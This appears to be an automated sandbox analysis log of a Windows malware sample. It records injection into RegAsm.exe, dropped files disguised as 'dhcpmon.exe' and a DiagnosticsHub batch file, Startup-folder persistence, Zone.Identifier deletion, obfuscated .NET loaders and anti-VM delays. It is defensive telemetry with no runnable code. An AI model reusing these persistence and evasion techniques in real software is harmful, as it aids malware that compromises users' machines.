        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeReversingLabs: Detection: 68%
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile read: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
        Source: unknownProcess created: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic file information: File size 1124888 > 1048576
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
        Source: Binary string: indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000001.00000002.522683399.00000000051B0000.00000002.00000001.sdmp
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: real checksum: 0xeeb70 should be: 0x11a301
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: real checksum: 0xeeb70 should be: 0x1196a5
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E8B85 push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E081F0 push eax; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E062D1 push ebx; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E062D4 push ebx; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E09D78 pushad ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7902D push ebx; ret
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009A8B85 push ecx; ret
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs - High entropy of concatenated method names
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs - High entropy of concatenated method names
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs - High entropy of concatenated method names
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs - High entropy of concatenated method names
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs - High entropy of concatenated method names
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs - High entropy of concatenated method names
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs - High entropy of concatenated method names
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs - High entropy of concatenated method names
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe - File created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe - File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe - File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe - File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe - Code function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe - Code function: 0_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat - Code function: 12_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7 RtlEncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeWindow / User API: threadDelayed 6998
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 475
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 523
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 593
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: foregroundWindowGot 770
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batWindow / User API: threadDelayed 603
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060Thread sleep count: 6998 > 30
